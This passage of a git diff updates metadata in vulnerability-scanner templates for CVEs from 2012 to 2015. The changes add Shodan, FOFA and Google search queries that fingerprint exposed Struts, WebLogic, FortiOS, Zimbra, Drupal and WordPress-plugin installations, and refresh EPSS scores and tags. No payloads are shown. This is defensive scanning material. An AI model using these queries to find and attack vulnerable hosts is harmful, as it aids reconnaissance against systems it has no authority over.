286a713a33..a27467581e 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -27,8 +27,15 @@ info: max-request: 1 vendor: openemr product: openemr - fofa-query: icon_hash=1971268439 - shodan-query: http.html:"openemr" + shodan-query: + - http.html:"openemr" + - http.title:"openemr" + - http.favicon.hash:1971268439 + fofa-query: + - icon_hash=1971268439 + - body="openemr" + - title="openemr" + - app="openemr" google-query: intitle:"openemr" tags: cve,cve2012,lfi,openemr,traversal,edb diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 5426e57f12..ca3ca13532 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -22,10 +22,10 @@ info: epss-percentile: 0.82867 cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: timely - product: all-in-one_event_calendar - google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" + product: "all-in-one_event_calendar" + google-query: "inurl:\"/wp-content/plugins/all-in-one-event-calendar\"" tags: cve,cve2012,wordpress,xss,wp-plugin,timely flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index e3f4c43eca..37f9bbe534 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.84417 cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: mnt-tech - product: wp-facethumb + max-request: 2 + vendor: "mnt-tech" + product: "wp-facethumb" tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 2f32796650..0c29ca82d9 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -30,8 +30,12 @@ info: max-request: 2 vendor: oracle product: fusion_middleware - shodan-query: http.title:"weblogic" - fofa-query: title="weblogic" + shodan-query: + - http.title:"weblogic" + - http.html:"weblogic application server" + fofa-query: + - title="weblogic" + - body="weblogic application server" google-query: intitle:"weblogic" tags: cve,cve2012,oracle,rce,edb diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index b1dc2b670f..23fac3c9ac 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -28,7 +28,11 @@ info: max-request: 1 vendor: websitepanel product: websitepanel - shodan-query: title:"WebsitePanel" html:"login" + shodan-query: + - title:"WebsitePanel" html:"login" + - http.title:"websitepanel" html:"login" + fofa-query: title="websitepanel" html:"login" + google-query: intitle:"websitepanel" html:"login" tags: cve,cve2012,packetstorm,redirect,websitepanel,authenticated http: diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index a6e3c72ed6..9c0290739d 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -23,9 +23,9 @@ info: epss-percentile: 0.59564 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: mf_gig_calendar_project - product: mf_gig_calendar + max-request: 2 + vendor: "mf_gig_calendar_project" + product: "mf_gig_calendar" tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 27efb88ce1..665ac342d1 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mysqldumper product: mysqldumper - tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper + tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss http: - method: GET diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index f82681390a..7d235fb8b9 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -24,10 +24,10 @@ info: epss-percentile: 0.65097 cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: ppfeufer - product: 2-click-social-media-buttons - google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" + product: "2-click-social-media-buttons" + google-query: "inurl:\"/wp-content/plugins/2-click-socialmedia-buttons\"" tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index b7c2900d20..029665f8ca 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -24,12 +24,12 @@ info: epss-percentile: 0.82559 cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: mikejolley - product: download_monitor + product: "download_monitor" framework: wordpress - shodan-query: http.html:"/wp-content/plugins/download-monitor/" - fofa-query: body="/wp-content/plugins/download-monitor/" + shodan-query: "http.html:\"/wp-content/plugins/download-monitor/\"" + fofa-query: "body=\"/wp-content/plugins/download-monitor/\"" tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley flow: http(1) && http(2) diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 5d5c070da4..75264eca72 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-4940 cwe-id: CWE-22 epss-score: 0.16414 - epss-percentile: 0.95527 + epss-percentile: 0.95998 cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 36789d4340..a764faa850 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.8837 cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: wordpress_integrator_project - product: wordpress_integrator + max-request: 2 + vendor: "wordpress_integrator_project" + product: "wordpress_integrator" tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project flow: http(1) && http(2) diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index a7dce5184f..18bda7acf5 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve2013,cve,apache,rce,struts,ognl diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index 742f976a69..9457daca56 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve2013,cve,apache,redirect,struts,edb diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 0898a2f4d1..c878a37996 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -26,8 +26,14 @@ info: max-request: 9 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve2013,cve,rce,struts,apache,ognl,kev diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 5a20bcae54..22e158038f 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -23,10 +23,10 @@ info: epss-percentile: 0.59874 cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: roberta_bramski + max-request: 2 + vendor: "roberta_bramski" product: uploader - google-query: inurl:"/wp-content/plugins/uploader" + google-query: "inurl:\"/wp-content/plugins/uploader\"" tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski,intrusive flow: http(1) && http(2) diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 01c044e875..7449461487 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -24,10 +24,10 @@ info: epss-percentile: 0.76703 cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: wptrafficanalyzer product: trafficanalyzer - google-query: inurl:"/wp-content/plugins/trafficanalyzer" + google-query: "inurl:\"/wp-content/plugins/trafficanalyzer\"" tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer flow: http(1) && http(2) diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 72ec0ae855..7b0d6009d7 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -25,8 +25,12 @@ info: max-request: 10 vendor: oracle product: fusion_middleware - shodan-query: http.title:"weblogic" - fofa-query: title="weblogic" + shodan-query: + - http.title:"weblogic" + - http.html:"weblogic application server" + fofa-query: + - title="weblogic" + - body="weblogic application server" google-query: intitle:"weblogic" tags: cve,cve2013,edb,lfi,javafaces,oracle diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 44204bde37..f7c0f63fdb 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -24,10 +24,10 @@ info: epss-percentile: 0.85273 cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: anshul_sharma - product: category-grid-view-gallery - google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" + max-request: 2 + vendor: "anshul_sharma" + product: "category-grid-view-gallery" + google-query: "inurl:\"/wp-content/plugins/category-grid-view-gallery\"" tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma flow: http(1) && http(2) diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index b31311fc5f..5571d2d703 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -23,10 +23,10 @@ info: epss-percentile: 0.85273 cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: cory_lamle + max-request: 2 + vendor: "cory_lamle" product: duplicator - google-query: inurl:"/wp-content/plugins/duplicator" + google-query: "inurl:\"/wp-content/plugins/duplicator\"" tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle flow: http(1) && http(2) diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index d18c3a90a6..e0d2283530 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -27,9 +27,15 @@ info: max-request: 2 vendor: synacor product: zimbra_collaboration_suite - shodan-query: http.title:"zimbra collaboration suite" - fofa-query: title="zimbra web client sign in" - google-query: intitle:"zimbra collaboration suite" + shodan-query: + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor http: diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 1eef11da3d..39dcfcb2c8 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-3206 cwe-id: CWE-20 epss-score: 0.2561 - epss-percentile: 0.96594 + epss-percentile: 0.96696 cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 5882453bd0..4a998c9e31 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -21,14 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2014-3704 cwe-id: CWE-89 - epss-score: 0.97537 + epss-score: 0.9753 epss-percentile: 0.99992 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: drupal product: drupal - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" tags: cve2014,cve,edb,drupal,sqli variables: num: "999999999" diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 6eeb36f740..3bfcc78127 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: oracle product: fusion_middleware - shodan-query: title:"Weblogic" - fofa-query: title="weblogic" + shodan-query: + - title:"Weblogic" + - http.title:"weblogic" + - http.html:"weblogic application server" + fofa-query: + - title="weblogic" + - body="weblogic application server" google-query: intitle:"weblogic" tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 8ed5d7e85b..32eb83f5e9 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -21,13 +21,12 @@ info: epss-percentile: 0.50288 cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: activehelper - product: activehelper_livehelp_live_chat + product: "activehelper_livehelp_live_chat" framework: wordpress - google-query: inurl:"/wp-content/plugins/activehelper-livehelp" + google-query: "inurl:\"/wp-content/plugins/activehelper-livehelp\"" tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index f66829fb81..788487855f 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -23,12 +23,11 @@ info: epss-percentile: 0.48664 cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: import_legacy_media_project - product: import_legacy_media + max-request: 2 + vendor: "import_legacy_media_project" + product: "import_legacy_media" framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index b2ad8dcb63..6f55fe70fd 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -24,11 +24,13 @@ info: epss-percentile: 0.50948 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: katz - product: infusionsoft_gravity_forms + product: "infusionsoft_gravity_forms" framework: wordpress - google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" + google-query: + - "inurl:\"/wp-content/plugins/infusionsoft/Infusionsoft/\"" + - inurl:"/wp-content/plugins/infusionsoft/infusionsoft/" tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz flow: http(1) && http(2) diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index cb9287e5f9..55155f129a 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -23,8 +23,8 @@ info: epss-percentile: 0.48718 cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: movies_project + max-request: 2 + vendor: "movies_project" product: movies framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index d438956a11..b44eafeb60 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -13,13 +13,14 @@ info: - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb - https://nvd.nist.gov/vuln/detail/CVE-2014-4544 - http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4544 cwe-id: CWE-79 epss-score: 0.00118 - epss-percentile: 0.45595 + epss-percentile: 0.45869 cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 64a4b59675..acd2614a2e 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -22,13 +22,12 @@ info: epss-percentile: 0.48556 cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: visualshortcodes product: ninja framework: wordpress - google-query: inurl:"/wp-content/plugins/shortcode-ninja" + google-query: "inurl:\"/wp-content/plugins/shortcode-ninja\"" tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,visualshortcodes - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 5819de6277..e71bb8dce9 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -23,9 +23,9 @@ info: epss-percentile: 0.48718 cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: cybercompany - product: swipehq-payment-gateway-woocommerce + product: "swipehq-payment-gateway-woocommerce" framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany flow: http(1) && http(2) diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index ca0f4e8917..7abbea3f83 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -23,9 +23,9 @@ info: epss-percentile: 0.40792 cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: ultimate-weather_project - product: ultimate-weather + max-request: 2 + vendor: "ultimate-weather_project" + product: "ultimate-weather" framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project flow: http(1) && http(2) diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 51756c4c86..be10c4aaba 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4592 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47838 + epss-percentile: 0.48718 cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 92a45f5fbf..2158f2d193 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-5368 cwe-id: CWE-22 epss-score: 0.09191 - epss-percentile: 0.94512 + epss-percentile: 0.94648 cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 8a02870d18..267fcd7ff6 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-6308 cwe-id: CWE-22 epss-score: 0.0922 - epss-percentile: 0.94519 + epss-percentile: 0.94654 cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 57bc690ac5..1e7fbdb48c 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -28,9 +28,12 @@ info: max-request: 1 vendor: gogits product: gogs - shodan-query: title:"Sign In - Gogs" - google-query: intitle:"sign in - gogs" + shodan-query: + - title:"Sign In - Gogs" + - http.title:"sign in - gogs" + - cpe:"cpe:2.3:a:gogs:gogs" fofa-query: title="sign in - gogs" + google-query: intitle:"sign in - gogs" tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits http: diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 2593cc8aa0..9431767733 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -24,13 +24,12 @@ info: epss-percentile: 0.96912 cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: digitalzoomstudio - product: video_gallery + product: "video_gallery" framework: wordpress - google-query: inurl:"/wp-content/plugins/dzs-videogallery" + google-query: "inurl:\"/wp-content/plugins/dzs-videogallery\"" tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 1f1d88f537..9c74b4b5e7 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -24,7 +24,10 @@ info: max-request: 1 vendor: eleanor-cms product: eleanor_cms - shodan-query: html:"eleanor" + shodan-query: + - html:"eleanor" + - http.html:"eleanor" + - cpe:"cpe:2.3:a:eleanor-cms:eleanor_cms" fofa-query: body="eleanor" tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 4ed01ed159..075ca2c9f5 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -27,9 +27,18 @@ info: max-request: 2 vendor: icewarp product: mail_server - shodan-query: title:"icewarp" - fofa-query: title="icewarp server administration" - google-query: intitle:"icewarp server administration" + shodan-query: + - title:"icewarp" + - http.title:"icewarp server administration" + - http.title:"icewarp" + - cpe:"cpe:2.3:a:icewarp:mail_server" + fofa-query: + - title="icewarp server administration" + - title="icewarp" + google-query: + - intitle:"icewarp server administration" + - intitle:"icewarp" + - powered by icewarp 10.4.4 tags: cve2015,cve,lfi,mail,packetstorm,icewarp http: diff --git a/http/cves/2015/CVE-2015-1635.yaml b/http/cves/2015/CVE-2015-1635.yaml index a3614de746..e7743b1edb 100644 --- a/http/cves/2015/CVE-2015-1635.yaml +++ b/http/cves/2015/CVE-2015-1635.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: microsoft product: windows_7 - shodan-query: '"Microsoft-IIS" "2015"' + shodan-query: + - '"Microsoft-IIS" "2015"' + - '"microsoft-iis" "2015"' + - cpe:"cpe:2.3:o:microsoft:windows_7" tags: cve,cve2015,kev,microsoft,iis,rce http: diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 4023c545ce..320e3da092 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -21,14 +21,20 @@ info: cve-id: CVE-2015-1880 cwe-id: CWE-79 epss-score: 0.00201 - epss-percentile: 0.57435 + epss-percentile: 0.58077 cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fortinet product: fortios - shodan-query: http.html:"/remote/login" "xxxxxxxx" - fofa-query: body="/remote/login" "xxxxxxxx" + shodan-query: + - http.html:"/remote/login" "xxxxxxxx" + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve2015,cve,xss,fortigates,intrusive,fortinet http: diff --git a/http/cves/2015/CVE-2015-20067.yaml b/http/cves/2015/CVE-2015-20067.yaml index 63f8969bfe..4b276bd3a4 100644 --- a/http/cves/2015/CVE-2015-20067.yaml +++ b/http/cves/2015/CVE-2015-20067.yaml @@ -29,7 +29,7 @@ info: product: wp_attachment_export framework: wordpress google-query: inurl:"/wp-content/plugins/wp-attachment-export/" - tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export + tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wp_attachment_export_project http: - method: GET diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index bd3ab9b0c6..123d364661 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -27,7 +27,9 @@ info: vendor: magmi_project product: magmi framework: magento_server - shodan-query: http.component:"Magento" + shodan-query: + - http.component:"Magento" + - http.component:"magento" tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server http: diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index cf6695e912..654b138e9e 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -28,7 +28,9 @@ info: vendor: magmi_project product: magmi framework: magento_server - shodan-query: http.component:"Magento" + shodan-query: + - http.component:"Magento" + - http.component:"magento" tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server http: diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index 54b047868a..82e71b65c9 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -17,15 +17,17 @@ info: cvss-score: 9.8 cve-id: CVE-2015-2794 cwe-id: CWE-264 - epss-score: 0.97458 - epss-percentile: 0.99953 + epss-score: 0.9743 + epss-percentile: 0.99939 cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dotnetnuke product: dotnetnuke - fofa-query: app="DotNetNuke" + fofa-query: + - app="DotNetNuke" + - app="dotnetnuke" tags: cve2015,cve,dotnetnuke,auth-bypass,install http: diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index d44fdec3f1..1251a69481 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -24,11 +24,11 @@ info: epss-percentile: 0.69186 cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: documentcloud - product: navis_documentcloud + product: "navis_documentcloud" framework: wordpress - google-query: inurl:"/wp-content/plugins/navis-documentcloud" + google-query: "inurl:\"/wp-content/plugins/navis-documentcloud\"" tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud flow: http(1) && http(2) diff --git a/http/cves/2015/CVE-2015-3035.yaml 